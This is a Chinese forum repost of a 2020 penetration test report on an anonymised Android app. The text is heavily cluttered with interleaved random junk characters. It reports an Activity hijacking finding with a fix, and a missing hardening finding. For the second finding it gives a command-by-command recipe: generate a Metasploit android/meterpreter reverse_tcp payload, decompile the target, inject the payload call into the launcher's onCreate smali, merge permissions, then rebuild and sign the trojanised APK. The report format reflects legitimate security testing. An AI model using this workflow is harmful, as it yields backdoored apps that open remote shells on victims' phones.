原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

' I* k* e, I5 b( ~# C3 O ) W0 E9 X: d6 K- G. r
( B9 s: p1 M1 L( S) T8 |; i. g1 i 2 E: _! o' Q4 y# T% M5 K

8 V6 g# [/ R/ g: o: q( y# a- b : o& L% N6 E" s* l 文档编号： ( g& M7 `; {+ n; l : `+ x% v# p# e& j/ }

/ P' D) F# t% P + n0 J/ d# q. E0 B * ?6 Z# A3 ?2 b* t: E, ~- y3 o. I% l. m8 y) ^8 Y1 b9 T5 C7 v2 f8 G

: Y; T- D, `; p& ^) v - |2 O2 @8 L; ~9 ?5 s) p- f/ c" G ' ^2 O) Y5 k6 S) t& g0 ` 5 X% {1 R- i) L. F

6 N; \9 D1 J2 m3 r2 `4 P e) c* G& B/ g' s7 w/ v 9 m" R0 s- R9 q! C1 p. O ! ^) a7 f1 \) B4 O% V3 r) |* Y

2 P# R. e9 r! V& V: C - A: Z2 s' T9 I5 S6 j, T7 |+ R; F' B. a 1 q$ G9 B @9 e7 f- V & D I) n6 J) F# z1 n

e, ^2 @2 q& R+ i7 G9 n 3 }' M6 h* M6 r6 ~0 y } 9 F9 s9 P3 |0 O 5 P8 Y# n: [: Z# S7 |4 P( L

# ^6 j1 g7 O( z, Z. D0 x, ?0 F4 d7 A: |( b* O 某某某APP渗透测试 6 G/ j1 I% ]- ~8 k g( N0 d _/ w2 e: `5 L# ]2 l

$ r) H, }" h/ t. z" {( A1 {7 Y h/ M7 { h9 y6 E4 k9 X L + e8 f& S: j" ]1 O; v0 F/ E' h" k' I

- O4 }+ j& Y6 w7 |2 B- U w! M7 d) w) s7 V `" p9 {2 G5 J. ^& Q # F( J2 |0 {) L0 O

O8 y" u4 g" T0 ~/ M - g' V' t1 g' D- ] x# n/ v; E 4 P# A8 `) D! J) \ b* d+ Y( R1 ^& i9 c- b) x

k- c7 f' d1 J, y9 J8 I0 r- R; W' ]' I: K$ p" O& _ 2 @, O6 X7 }9 s9 c$ g & m# O8 S* t% u# z6 K9 U/ |

" o# h" A p E: \ ( O; p6 H7 ` i! H 技术报告 . Z. K6 c' V) v# p $ ^+ H* I& e) U2 D2 G( o5 K8 V

1 F8 n4 r# {% y/ Z8 Z1 d ; q& B- K8 F5 c9 D6 O F$ J; Y * E1 x! G# a" p " u. F7 A* I2 [/ y5 h3 I. l# C6 u* Z

3 @& V$ J2 V. S3 E8 m4 F1 H 8 @* K6 m& e2 d- G. |- Q ; G) _! V# P8 m& ? L$ q. b * ]' A) T' F. t

; K: N0 F7 U4 _7 g2 ^! U1 m 8 ?. @1 `' u3 e/ o " G' A$ e* `/ B8 t) U6 f! F" j8 |6 J( Q5 M5 E# z' s# N, x

) w9 @* v' g/ N% x - M$ ^+ O# v7 U : H& H# I3 N" W5 C9 Y1 o. d; `) v: {9 e$ W

+ C! }# d2 _4 ^ r p4 L# V4 a# {& u : p4 T( j* ^* X. s# k 2 h/ c. f! c+ m" n+ d' }

1 s1 n( {- _4 F8 D- s* @ 2 F+ M* L- `) l$ b$ @ ) _: u* Y: H) D % g; F V: f: ~5 t' U- S

' u; q+ y1 f0 X, @9 D/ N* s7 M8 r5 ~+ { - B* e* K7 @6 _7 v2 ?' a) X $ j' P _9 D) e, V8 d& N

4 Y1 o8 E$ f1 o; A. X' ` $ Q; S) j; I7 D$ @; G; I9 C1 R * L! L% o0 x/ U+ a% n) v " x# {2 u5 @' X2 e/ o) Z( |

1 Z+ \' y ^0 k' U8 k5 W; u( K3 Z3 S+ Q9 r& H z, z2 c: U1 _1 W' b+ s O& W: j& T" |1 d

/ ]0 P: u0 ?; D( Y5 ]) i; p ; [9 K8 B$ s4 V) ^ + ~3 M9 m& N1 u( }) X& i1 s- e' { , ^3 g+ i2 [% s* P) n

4 h, _ g9 m/ @0 k- Q4 y6 e # \& D* B0 t$ C: ~0 l, y& i. C0 B6 ` + c: s k! i d0 ? * v( z2 m. c1 d* \

) s0 d2 W+ s. u3 ?5 P " F- E1 v0 W _* e8 F/ W 9 _0 `8 P5 y, w# V) f + m# _# s% Q' H# b3 }2 k. e# g& k

' O( D+ r. S) M& n 7 g2 k q7 ^; W5 X8 v: R } - G" {' J4 X$ c9 d8 j& S* @ , Z9 R; Y9 d4 }$ r6 e5 [: w) `. G V: E

* E( Y3 s. _ i1 B0 P3 k, n( l- ? ' Z# ~9 b, l$ C) G 0 Q; U3 e4 k" { U 9 v4 F Z$ `! e

+ y% q3 M! _, l: ] . o0 L6 \& K4 g4 V9 P ) t& y! _; s" n& R8 R) g 7 {2 f+ H9 e" u8 }+ u( f

# b0 V, o; y7 B+ M/ A" k' s & h1 c7 p: [9 ] 4 q; \5 D t( r8 W' G8 L# j 3 e$ V( s9 H8 t- Z- s0 }, s

, `7 N1 V& t; K5 _ ]& \+ d 3 I% Q* B9 U" r6 I# p- C ( a) P. p0 {! ?6 r L. \ h, p6 r # ?7 [8 \1 b; G9 ~% [* T! ^

- O$ }9 }& l' P4 M. M " O& F1 F/ w1 @( D * I; |+ w2 Y9 e% O% m 8 t# X' y0 u, E' j; s8 W# |# o

" R) N9 _2 B. @/ o3 l Y 4 ?+ S2 r; Q3 _+ I( c' Z+ n) Q 二〇二〇年 : @$ G+ q m" y8 d( E ) N- H! {9 t# C+ o. J$ G: k$ m

% {8 O4 ^( D8 I' G5 }: Y6 _" z2 B1 i( T; |1 y 目录 6 f4 i3 o0 z/ L8 L- v+ p 5 a+ r% M$ u; |! Z/ L5 T

' l0 \- P4 ~& ^; ] ( Q' o; R3 Y- y* r, S* h + U- @# O, |+ \4 X! J, g% E , L* K# _* r n6 x

8 c; f& P6 l9 r0 i, A$ d% l9 V ; j+ n1 c9 e3 T b- u 1 概述... 3 & M) c4 g% G; U% D0 m # w) ~( n. f5 @9 X

% o1 t( ~9 S5 m8 e( j 2 {/ a; [2 ?8 i 1.2测试时间... 3 # G/ U2 O1 U% R) Z2 ?9 L : D: K r" C9 P+ ^6 B

+ A) I; S M. L( B + w6 L& w8 Z |, ?- d1 s 1.3测试对象... 3 , s1 y) P2 _- K D* N% {+ f8 ?2 P 7 }. L# z. W* t, p0 h) [" }- h

/ y1 q! @# |: k0 {9 ?- g* [3 e5 ~! R8 h5 ~6 B% m 1.4测试结果... 3 ( r6 n3 q4 n: F; C/ E6 y6 z1 L 5 R5 T- H( K; M# c+ {, u4 F( X

/ H/ l3 [4 ]3 @- Q$ j7 L! | ) a5 t; o1 v, d9 K3 {9 S1 x; s 2 检测结果... 4 8 @" k. V, Y0 E& K w0 p" ? # ?; T. t2 g9 [% o* K

. v$ D* _- l, y+ Z) j# W 1 I; c5 @ [! g( H" G1 b 2.1 某某某... 4 6 a2 \& X7 [9 B7 k+ T0 c+ i 7 {9 I6 O; v8 ]- x" X

; s7 t+ C R# f, r7 \- v ! w& Q4 }5 ]9 E) x. g 2.1.1检测目标... 4 ; v3 e' ^6 a# _/ J+ e# J* m4 M ; G3 y2 X0 P" R8 j* F

+ v m$ Z% P; V) ^+ i# E. L& t" d, Y2 c 2.1.2检测结果... 4 2 b3 o' X: p' m" q7 L . @9 Q0 A2 W) a. Q

# G8 ~2 q+ ~7 A+ L3 W$ }! O ( ^) E0 h5 O' h! s2 [, i 2.1.2.1. 4 0 D' J# \+ n6 p! g$ G 3 q7 H% o# k# Z1 ?! |

* Y( o0 ~ v e3 z 5 ~3 y; ~0 ?: O& ] 2.1.2.2. 6 # C! W* Y- t. o0 [% o : r; v+ _0 I4 \0 \1 A

" }, l! o" x7 u- ^ # A' W$ G+ e& ?( ~4 p+ c 7 r4 W+ Z. E5 N( D7 N! @$ A( X . y/ v: R$ D) K5 y

, t4 A2 a9 x; {; ^ ; V' H1 \: ^1 _+ F0 B 1 概述 * r8 A% i9 G0 R 8 V- F( `0 |; g! k1 F: [' A$ d0 f! Z

4 |) H2 t* g2 X) f * Y- X9 |% p" x Z, ]& V7 |: G/ a 1.2测试时间 ! A! V$ O3 V3 ]7 j9 D 1 q, B5 o) W: X5 D

( U, W0 e b7 A7 ]' k; ^ ) Y# D3 P8 v! ?5 {+ T & m" _4 T0 W3 _$ Q0 v) k& U" b e- R7 S% W+ _; M% f" Q 渗透测试时间 , j& R c+ z6 j7 M6 D& v. e, ]8 } 6 x# J( @7 ~/ h& m) e; \|0 R6 j + n- R& t. \3 ]( f; ]1 Y ; o. I$ w7 L! U- k$ Q
2 \. T) {3 \7 d+ p : p4 Z. {9 k+ @# w( j" J0 z 8 z0 A) m6 ]0 i . L$ {5 E. `6 h0 u* v' ] 起始时间 6 v4 L3 \|' L. _# s- T( y5 v+ D0 r# @ ; a2 M, L; ^' r ) F3 {& `# ?: ], }' S; r2 F+ A	& i/ R% E2 p6 l& m1 f) [ " X" O" ^1 k/ a " B9 \9 [4 F$ J1 N. {( e 7 n: L. }2 d# q 2020年4月6日 / x/ X: P. R( ?! x/ C/ \| 5 r* k4 t! N0 c \|! x4 H 5 Z3 o& _6 j2 }1 W3 R% G! ^ 2 o9 a; V9 a8 i0 N) ?5 i5 g, x: i
6 F, s' b$ R' ]( Q1 x 9 o2 J) l0 O6 `5 M" A) S 1 ~, r. o- j" E* \7 s- ~4 a , }' M9 N! q# ^* ] 结束时间 3 a* K5 U E7 r2 M1 ] F, W1 ` " }- B# P- j l9 m1 L/ m 2 E. V1 ]/ k# V5 X# k & e4 K, C% g# N' j! {4 F3 ^	( Q$ G0 Y. H. l6 \|+ q$ \|4 E8 o 1 u% Y& w3 v9 o9 l e: t! @ 6 X6 c" q6 m* n; i! [4 w ( J$ z w" H5 R5 U" ~' _" G- _* K 2020年4月9日 7 H6 G4 x8 `' H2 ?* O/ m% u. n. j9 \|8 i8 I& J5 M3 \8 `6 s 5 s1 u& o7 c9 c' L 7 M9 ^% V2 d3 q" G A

B1 A9 H' d: M0 s- Z, L# m7 S+ _# [1 X 1.3测试对象 4 r8 m9 L, M7 r8 V) p* j+ w9 O. K# C" _ Z. V: Q+ l

9 s3 k' o+ l( C* H" `; j1 ]6 O b; k8 X" F$ }3 k3 h8 n 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 3 X7 x' J! z g0 F2 X1 D) l1 j + O! r3 ~ K( L

7 p. J {' w' `/ } 5 ?3 I' H% h, q7 Z; L6 A: E) E 表1-1 检测对象 # u3 Z) ^: p s: e; s" Y! G. _ ; ^* J0 n& ~1 _8 }4 C

6 h P3 q8 F* j" f$ G* Z- k, c, H3 a3 x # l Q) F: Y& I$ N0 v- f" J; M: w L7 {& V* a. [3 p7 \7 @& D 序号 8 K# g- {# Q5 x: u+ ~ ' \|$ X: {5 ^9 y4 t+ D& B' H8 F9 Z 9 P6 C$ w# Z( B 3 w, V" t5 l9 h' J9 y7 a/ r	0 S' l: R( G( X+ B* m# R8 H1 r8 M6 c. Q! Z; @6 a* H% S0 y 3 n( D. i6 Q3 k6 Z- U* F) _' t& W 3 \$ w% a, M. h- E 测试对象 @8 N3 d6 T) e; u% H0 ?0 ^ X 4 ]3 W/ A8 P. b0 I7 j! @ k/ \|: a 0 G# g3 o! g9 r/ h4 M* c; R) }8 O6 \' t8 g. A3 t5 P- n	$ Z( W+ f) r7 I3 @& S, D ! B* \, o9 \|/ t. q& r$ `% `" t! q ' ]: w9 w# X% i1 K P, h 3 F/ S9 T* J1 ^1 Y 测试地址 2 d( o; J' c5 Z ( R" r9 `# ~: v- R 9 s# Q& T3 E9 x) m: X7 T ! d; @5 ~! h# k2 \" k+ f+ ~5 X	! ^& E0 a( O. X, Y 3 H2 \|; o3 \$ @4 X# z . w4 p0 a2 t; l5 B2 x ( t0 J) w6 Q# `5 d8 _# e; F; s5 ~8 a 安全漏洞 ) {$ Q2 a) q' R8 w* r0 H6 M' ]9 f 5 h G7 c) ~; a) n # l5 _' @) S; s& K9 @# v' C' G9 }: K" Y
A4 u- X2 M3 D: z7 y7 {8 ? - I" k9 l: e( Z( o8 d1 V 3 b5 G' G& Y! }1 p$ B& N : A! O1 e8 n6 J- ^) p- [$ ~ 1 4 w" v+ A, }8 Z3 G, f7 E8 F+ f O4 z+ r/ H ; q" `+ h* C* A( i( n% J U5 d7 z + h+ ?& S# q6 H	' I' ?6 U$ N+ m8 M + [" a2 \|/ f* V, f # w) D, \8 P. E' \( H$ h c* m/ U1 q- ~ / ^" ^+ T0 f% N4 ]5 A& W 某某某安卓APP # {; e: \. Q x" C& V3 `! I $ E8 l) {, e: s- M. y) l 0 u' l4 O" S- H! _7 X& \* L* S: X& g * @+ c6 v t3 l; @4 r0 b4 w	- c* h! X* q0 e3 K . G. H% T( B. X: y' _* y6 [ # [' a# u& D3 V) G 8 ~- z$ D. m5 H! L " W: P1 n' v+ [* z9 x. O4 f ! u, \|6 m7 }9 k: T1 _, q B3 i ! M# @" o9 ~! Y9 u6 J2 e6 i. X * j a! v: a3 e. c2 [& N" z	6 \|& j' s. s& q8 y* \! u . p: t2 r; _' ~1 p! H- s- E : Z. F# Q$ F6 O6 ?* k$ h3 ^ " q1 `1 G0 Y0 A0 ^8 b- j 2 2 E4 k* T6 R O& V3 D1 o" h, t 2 @" q$ g5 t. e( x% o " p G% n+ d1 s$ K% m3 W. D: F9 w4 O5 l* g# L+ B

& ]" S1 ^1 j( g$ x( B% O& m- Y 1.4测试结果 / x0 {; C, N9 S6 R, [ * _, A# y" G0 J3 F

/ `* a" t. H, |& l 2 A9 b7 D+ \3 N9 U2 B" q9 C1 E 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： # t+ h8 c/ L( \ ( q7 v& E+ x5 ^2 C- P

" @# d5 a* G) N* V6 w3 l3 I: @9 g% h( W( r! A7 E * X! S9 T3 c! I! Q& N0 S' q! f2 {8 H1 r; ~6 o2 }. |1 a

& o& y' ?* k# l 3 m5 G% T4 X( C. ^$ |0 G 序号 2 \+ C( u: O. `2 S4 [ g. @ {4 p. @

: x, R9 F2 Q7 b8 _$ N & z& g9 C; P7 V" _! Y; l6 l 系统名称 ; _( @0 z, W2 O8 p 0 T1 F( b! z5 z) f ~

) p. z* i+ ~" }1 _: m & Z, d* k3 ?( a' [ 漏洞名称 6 m$ \% l& N: H& B& r3 N: e7 I2 Q0 f( g$ Y4 v

' L. w. f: ?1 C3 n# k" A" x/ r9 U( d2 n3 B 漏洞危害 1 j. T# E n" ^. t " S! T- e" }& X( r4 V/ u( e9 g! c

2 y! w3 g- [! c3 E: c % c4 f/ d4 U1 H! m; Y# S 修复结果 ' z7 q) @5 \8 g+ R$ w; i8 u 1 E4 s5 P* q) z; n

& m. Y8 K* |$ ~2 ^/ F/ }. \0 y# T% S 1 ! P- z2 y! c: H( J7 n# V* I4 }7 q$ s$ Y7 Q- @. W; y) e

; \: C: `7 l1 N6 T$ \- c 1 v2 m, E7 w/ J8 d7 S2 j4 ? 某某某某某某APP ' ?, b2 t' [" @' t; M4 T 2 g$ H. b; l) n5 f

+ _; o% }( q6 U + s& F. M) |, J5 c- ] Activity 劫持 8 h2 [2 n: R' m 1 Z1 D" O9 R ` k# p

& @% F: K R0 A# _ E / \6 B* x( y+ z2 h# ^ - w G+ y7 R/ V/ M , R& Z: j* o3 c2 ^. G5 L, c# G

5 ?. k6 \' b2 D6 P9 {4 ~( b) e& A7 D; a& l1 _4 } 高 8 I3 V3 T5 L' O9 ?; R/ m! q3 J5 |. t4 k6 Z0 ~% y

" P) ?5 H; E$ T- X, D $ g9 y6 N" \: ]# J4 \9 q5 M # k9 ? m7 Z8 ?1 d; N - O4 X1 c; K5 ^* M4 Q

. F0 U* ^5 U1 e/ y+ L . c( ]' C9 }/ {( u, g7 X 2 2 W: a! K- J6 g9 P- E , X- R; [8 [; f- }. `5 }

, Z% w$ I/ i/ M. `( H0 ^$ q0 f 1 j1 P: r- q1 j6 f 某某某某某某APP ! \" n! [6 B6 i; g% u $ [# }( ^* [ Q7 j" {

0 R, D9 Y& ~8 o9 \& T 6 h: ^( M* f, l9 m1 u, k 反编译二次打包捆绑木马、篡改APP代码 4 i' x6 R: A7 H2 j2 @: g! c

% |8 i) p! H8 R * t6 x' |, d$ ~! _( ~! [ 高 0 P- A( n8 k7 S6 `) t ) j# H. U: |1 E0 k

: l, _/ @- \2 G* J; A7 W/ \) \ ' ~ P$ d9 J" Y8 r' u$ l 2 {. I/ S% S3 q& u3 U" M$ o; S 5 ~' u& Z5 f$ _3 f- W9 o/ w

* b2 a v% m, H' v6 N ! |2 a ~0 G/ N4 H " L& c; k) C* ^5 v9 i D0 m5 Z: G- p" k/ `

% E0 v7 }7 B+ ?, K' S- [* V/ h% ^3 r: ~3 | 表1-2 测试结果 # s+ e9 s9 g( T/ Y. C/ l+ m+ a1 B3 o

& [9 r% w9 m- N ( H7 M9 h& t' }/ r 4 E( C6 F/ o3 X) W " }% ^) {& F6 Q

, o M* y* {* |1 E8 I) S$ W / g7 ?. [/ C; O" I; B: r 2 检测结果 & [ j3 y. w$ s6 z+ X7 F3 ?" ]" O! O _& q0 |; e0 W1 J) `0 V

- T1 `. b1 l* B0 W2 b: T : N: e7 N# V. U6 @5 b: W 2.1 某某某 ! F$ ^* P* W! ^0 Q( |! `. n. v ! p; ^- S1 o" U* S( I

5 ? u) b" X" {. x" W9 R+ @ , W- K# J# x" S; k9 A 2.1.1检测目标 " x8 [4 I$ g% R" p ' X# ?: w" T& N' t1 N4 q h

- ^( a' }! U+ ^% C; }6 W' w + O8 P9 w2 c) z 目标地址： 某某某某某某APP ( B: P U8 Z8 M3 y+ T" i i( w 4 ]& P+ I6 R, a; p* t6 L! }( e

) z; Q3 k' [% l+ b9 ~+ Q 5 P* K) ^/ Y0 U* k( e. K* h( e% N- J! U 2.1.2检测结果 " I }: I$ n2 r$ ` 6 m4 Q) U, t7 }$ @

! o' {3 Q; |9 d3 ?" K& p 1 h; o# o, c- B- |7 a 2.1.2.1 ! }9 ~1 H# P3 \- X% E 7 s e: F& K5 g1 C0 }" D# i

: f+ l3 H5 [ q" h( i6 S 9 E' i7 p3 Z) E 漏洞链接地址：某某某某某某APP ' }! \( q3 W: ]" P& N9 V, Y/ O% l7 V q* d

3 a! p8 c9 v: X4 M6 F + n7 S' u! K7 |" q' X5 } 1 H* Q/ C/ e2 z! j2 |+ E 5 V. x9 W( A3 d4 e2 ]0 O( G* c

: p- }" u# \7 S2 u 8 `) f/ U4 R, q+ {) k 漏洞分析及取证： $ A8 t- N# p5 f! d \# o% b' l3 Y* v

+ I1 l8 c( }. |1 o( k6 S; O2 k: b' _/ B+ ^+ V 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： / S8 k1 r: X B, r: [ 0 x" A% W: Y* ~# N5 Y! j

$ |0 Y& w8 M$ @ 4 @, |- B# B m0 l* q, e& s & f4 y2 ^5 }1 {4 M * j1 J" k& t+ _3 C) D' }

( S: ~# s7 P7 f1 D . Z" V' u" p' G K; h5 T* e 6 g# q0 H5 p- }* h- Z* y6 U- t6 ?( D8 j% x; l

2 S8 ?& z; v. x6 y: A5 Q % ?0 h% z8 q V$ F2 m( C3 y 6 g( _" b. c; J+ I! y! i ! |2 |+ W0 _6 q1 S8 n: L) j+ k1 f

. h! f0 |/ R: _6 W A- u9 K) n0 Q6 O3 U* x( X , f5 i* `0 H* k( n, E% r5 e , i" P1 E, a7 u: J8 E" I

) Y( g, D& h$ o M. V$ u+ [ * K& e2 o: ~# C$ j0 W5 Y ( A- C: [3 Z9 e Y; K: ^! c+ B' R& h& ~

0 u9 S& R7 C- [+ P4 q ! O2 |% p0 s. m; h' O$ O$ r/ @ 漏洞危害：高 $ J# ?: u/ M. K% C* t" i- M; T* e# p9 I9 a+ `) X8 g

( Z) ` d, v9 [# Y8 a! \! I# f) o' j- U/ { 4 Q) U1 ^: n" N1 E) A. B8 P4 P ; O2 `/ D6 J* m/ r# }7 M$ f% k' _ 严重程度 6 ^+ E( Y1 X4 O6 h( n , p) Y# T4 O2 k/ e6 N; n. t ! k/ X \|* _% X k) L6 S7 @ : E1 V/ @, O- I* o# [2 E; \	: r# n- r. \|/ L5 [) t, c; J5 Y H+ C$ z! n; O! ?3 z9 x 1 ]) u# \" N% _ 1 S; P" u l+ u2 T5 V% S 高 8 k) ?) p+ ^# L" q& X ' _$ }7 D4 j: A1 h. w C6 x. I& v9 N . _" T0 c/ s& b5 ]9 E ) z7 W: _# k5 [& D' \|	" w) J& ^& i4 M d/ g% U6 e- e+ D& }% \|/ O3 L% h4 z) h% `7 ^ 7 N' H0 K( N7 r2 C4 t 9 S: n4 v* G" \9 }! S" w4 q' c9 ^ ■ $ t4 c- u) D% d, t 4 w! o3 S( {& i : E2 D3 v" h* y+ M' e( f ; ~" o: _+ O! W3 K1 d5 D* ]/ I	9 b* @5 I4 i# n8 B ' @" W: A! y+ S, A! ^- { 2 w. ]2 c6 @" F' x' z4 O$ G b2 W, y- \|& e x0 Q8 \| 中 0 \& m# z( I6 ^ f! M( B# D9 K ) l1 l; p2 t$ }2 Q9 {; l( d5 }: q) W; c & r. ], Z% ]% f& M4 ^% R - `) ~# R! J0 f/ l! Y% A5 d5 G9 O+ N	+ E% O* I- R$ f- A9 L" j! E4 L' ?6 o3 W" H& t' v9 v ' @4 x- Z9 h% S: o8 ?6 a, \ c! D0 d7 ]/ y - V/ q5 S6 `9 r& i2 ]) S 0 D& ?+ L' G) \. ]. Z7 y ) f$ a# \" @& c& b _: d 2 j' H" L1 R" o1 d) c* O	7 k. Z; C6 z3 Q* j& y& y$ y' k( n- U; v/ e/ t" h- W# q T3 ?$ B 9 P1 O- H6 z p0 x; i. Y/ A7 q $ [/ ?; }8 g8 `; V! c$ \ 低 0 A: K# d, U0 A/ C8 C% A( F- F M$ Y 3 d/ I$ S5 B& R6 }. p+ t" X# C % u( A/ X% ?9 ~# B& V6 {4 R9 [6 N. C% @, \: b" x( T( b	) J0 m: T/ j6 }3 @: I . i/ ^$ O: R' C ! N+ a# e5 S0 }9 Y: z 4 M# q, N, _' a1 D) K# x 7 y5 o7 w: v' V5 E- y 6 B( b& \|8 O' h* s; b / S0 w- [* w7 b : O( q+ V" \|' w, J* v

+ A0 z8 S4 v* a9 `* J ; b) ^; j0 L& p2 R, Y G 7 D% C* L' b) u) }6 G% M ; e; `, Q4 ~: f, t' Z

3 z- p! W9 ]2 o : o. J A) [2 Q/ {. G! e1 T! q 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 - d7 I$ [1 A$ r( k( _' J0 C' V9 `' }0 Q! D) h

& V$ E) ~8 q2 D! U3 C! H- u" ~4 T! A N 4 L( k, X7 [* B1 z9 p4 @ * |! f% j0 A8 l7 C

: ^' | ?5 N& W! d W. c6 t, s 7 Y' S- `9 u4 n: e4 Z ; i9 E* `; D# F4 L* a: C % x- x, E- m x2 k7 M7 [9 B

8 L% X5 j& N$ v7 A( ~* Q8 S ( p% y9 C4 O* _; } 2.1.2.2 2 e$ H9 I+ b( k" ^! k& Q6 G( X ' J9 V" H4 X/ O6 E# n( `- [8 v+ ]

5 g# ^# g. h: A% m; j- D 6 c( M) D3 _9 `1 j 漏洞链接地址：某某某某某某APP ' r3 G( e. f w# L 3 m/ `# }" ~: g Y

* c) g3 l- b) q/ n. a0 g1 D ! G2 h. ?+ O# L* f- R+ j1 k1 g 漏洞分析及取证： ( J* L' [) V) W3 }$ K( i 8 z& K5 Y4 }+ Z; S6 ~, d

/ Y5 x0 e1 Y' b; U; v, g% k 6 B' ]6 U1 a1 @1 J, R5 S 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： % @/ u& G( y% h' a7 s7 u; S# D# I% ]/ f

! u7 i0 y. _# v8 {7 C) a& W / M/ ]5 h; q3 j2 I4 G 用Metasploit 生成木马 apk ( @, M" i: Y6 h: q 9 B8 T. d. L- O

\/ \* ^" I6 j% X1 x; n ; ]6 G5 s) T. p2 U8 M& P msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / r: t& r8 z' g2 ` 7 v( \% {% C/ L; c+ W! v: }

# i& Y/ U1 {8 q( n4 W1 M % D! G- V! I& P' ^ 反编译目标apk和木马apk " k$ U# K1 ?; S4 p* w' B0 u ) ^6 g- F$ v5 j9 s

# V' b: K9 x3 a , u+ g$ G$ O: g+ x; a( q apktool d target.apk
% o7 P) F! v& e9 d6 ]$ [ , ?8 Y! s+ }! `& a2 G3 f" K apktool d cockhorse.apk / _: y9 m, u& v: X" n1 ^- i 1 N: y% h. j# i5 Y. Q

9 d: m4 X' ^4 z R9 y' A" i% s& L$ `2 H r$ N" @5 m, ^% s2 Q+ r 木马 apk 注入目标 apk 7 n. q$ x; `' a8 b% Y! ^. b3 L 3 I0 M, X: q# h. D: l; t2 d

6 C1 k, p9 w% [ F+ {5 \/ p 2 \/ Z0 v4 ?) x. ^' [- @" x 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
1 A! B) `/ V* H- A0 R; l , x. S! T7 h2 `$ v+ Q" ] invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V & N$ w, G+ K; ]% }- `# X( ~

3 F; B' B6 v" g/ [ % ?6 j/ ^" \* Z Z- |) ^! K8 X4 n0 C 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 - {# U! W/ v* _+ d. | ( Y# r1 c" I/ U

: r9 u, J" U* }+ ]* a* `5 ]/ P 7 X7 M; A6 z7 C3 `8 Q 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 . e9 d) J: f' O* H; t `- { 4 F) q9 D8 {$ M8 ^+ v+ x; s

) O; u: h+ @! [5 N5 G! E. U* a' I $ M. I& P* e6 x2 e( d1 @ 回编译生成最终 apk 5 \4 h2 J; G1 }* w : }$ h- A5 Z" m0 _9 p% l

/ C, r- Z4 Q2 g* g1 m) q( n. H 重新打包 + y- ^9 v6 w+ { f/ u0 Q 3 s" m+ x! M4 o7 e9 i/ J

1 n, S$ x: e# F, E# p* N9 L 7 [+ @9 p `$ x& b4 E% m7 d! T4 P7 o apktool b -o repackage.apk target_app_floder 8 C6 j/ C* h6 T' M 8 q7 [& ^, R5 J3 c$ X

. D/ g( M% `# x. ?5 E % E. H8 p v" }0 J 创建签名文件，有的话可忽略此步骤 6 b4 q* E) E" J* Q! }$ i- J$ r & |# _! b6 k; L/ S* \% \3 u6 |

/ G$ n5 r! \' ?1 E: D. A% z 7 {% L5 b; I5 }0 V keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 * H$ [1 I5 |. r: N$ P' ^9 Y( t) z b; K, v

; E5 M; E: ?& A7 G" Z) j( ] i) S- ^. k8 ?4 i9 d/ P; ^ 签名，以下任选其一 : z: D: ^; ]# J9 F' \, [% P4 S. K$ B % b. j- C. I. M6 U% u

. {* `+ Y8 `" l0 L7 f4 m7 b$ e4 c3 ^) Y7 T- ]! c jarsigner 方式 ! S7 _7 d- m1 p; @' X4 `+ J- C' S' l) l

) o, K) I3 v# E8 O0 V% i. b; {' }$ g( S( @% u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ( E" p X. O: d+ r1 I' j8 J9 R/ F' u E) U" `# v

: r$ u) T6 p+ @ Y1 p0 W* B, Y; h! y/ T5 g. { apksigner 方式 5 P% ]" {9 e+ c# A6 u 2 h. N1 u4 o/ X0 S6 J

9 Z" G" |! g- h+ ? 7 T' d" _ ?* i1 D7 S5 X apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk / g2 h% l) ?. X- L 4 j3 l4 y5 @3 t

) U6 t1 i* o- F+ [* n " n; Z8 D( c" A# e0 _! t 如需要禁用 v2签名 添加选项--v2-signing-enabled false ( z) I0 v: {& [# g0 m; j& P3 K4 K% G6 c/ l

. I% P' l, U9 q* ^2 W j9 S4 l- D/ D ?8 b' p5 A" ? 验证，以下任选其一 * b. [; M) s+ s5 [ k$ q% @) k% k( N# h1 [

# P; d6 w e! i) L9 |$ I3 T( }' M* s+ ^5 H jarsigner方式 7 W* @! [. H8 [ ]5 o5 ]8 n! G G 9 z7 ^( G* M% J, J

' s% a# Z% ]1 S0 a* P5 D 7 M% L' x& [. X$ d. x$ b8 D jarsigner -verify repackaged.apk ! Z$ ~/ ^* p: y+ Z * p2 i# E) _: k2 E

/ W, e% |3 L. c, N" l5 i A! M6 V/ y! M5 v apksigner 方式 ! |' `$ ?( }$ x& ^' @$ {& u0 n5 h 7 ^3 }( ?: }" p

% }9 R) f, ~& v * m, P# T7 w2 w8 M7 f apksigner verify -v --print-certs repackaged.apk ) j& J; J# E, E& }* A! `, x- G4 c! Q+ V

s+ A$ P7 b* C% ^. d3 J8 g# i$ X/ e& d8 S3 t* Y& Q keytool方式 4 r1 I: _0 h Z7 h! e8 J2 e3 t' g- W5 _* f4 |3 _" K& ?0 K

3 Q2 y6 e9 l A0 g / q" n; B% p3 V& @ keytool -printcert -jarfile repackaged.apk ) P* {" w) E& b+ q# H7 L7 V ' g' }% ]7 Z: w. i$ N

0 d" j0 E; h4 r& t$ b z, z# z5 {- @' f% W2 S 对齐 7 X6 L% L; B/ S6 P: D. Y5 P- v: K ; l( B3 A; Z% I- @1 F* X

